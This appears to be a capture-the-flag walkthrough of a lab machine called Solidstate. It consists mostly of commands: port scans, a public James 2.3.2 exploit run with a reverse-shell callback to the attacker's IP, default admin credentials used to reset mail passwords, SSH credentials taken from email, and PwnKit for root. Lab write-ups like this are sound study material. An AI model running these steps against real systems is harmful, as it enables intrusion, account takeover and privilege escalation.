Ping
ping 10.10.10.51
Nmap default Scan
nmap 10.10.10.51 -oN dnmap
Nmap Script and Service Scan
nmap 10.10.10.51 -sV -sC -A -oN snmap
Nmap All Port Scan
nmap 10.10.10.51 -p- --open -T5 -oN anmap
We found one extra port
Service enumeration on new port
nmap 10.10.10.51 -sV -sC -p4555
On port 80
Will Search public Exploit for James server 2.3.2 version
We got some
Will you the exploit db’s https://www.exploit-db.com/exploits/50347
I have saved the python script in a file named exp.py as always
Will run the exploit
python3 exp.py 10.10.10.51 10.10.14.6 4444
So now we have to wait for someone to login via ssh to trigger over payload
Or will try some way to get in Will try with Administrator tool on port 4555
telnet 10.10.10.51 4555
have used default creds root:root
So we are admin now, Will explore the session
HELP
Will list the users
listusers
Will change password for any user of our choice, I’m going to change password for john
setpassword john Password1!
Will try the new password from pop3
telnet 10.10.10.51 110
USER john
PASS Password1!
Great we changed password of john successfully…!
John as no emails, so will try to change passwords for other user and look for mails.
Eventually Mindy has mail
LIST
Will read the content
RETR 1
RETR 2
We got SSH creds on 2nd email
mindy:P@55W0rd1!2@
Will ssh now
ssh mindy@10.10.10.51
Now will check on our reverse shell
rlwrap nc -nvlp 4444
Nice…1
user.txt
Now will jump to privilege escalation…!
After a long Enumeration there is now way around to get escalate my Privileges
But there is one, PwnKit it is…!
I can see pkexec has SUID , So I have check Pkexec version and it is vulnerable one
find / -perm -u=s -type f 2>/dev/null
pkexec --version
It is 32bit system, so I have transferred Pwnkit32 to the target machine and ran it
chmod +x Pwnkit32
./Pwnkit32
wE aR3 R0ot…!
Root.txt
Done with Solidstate…:)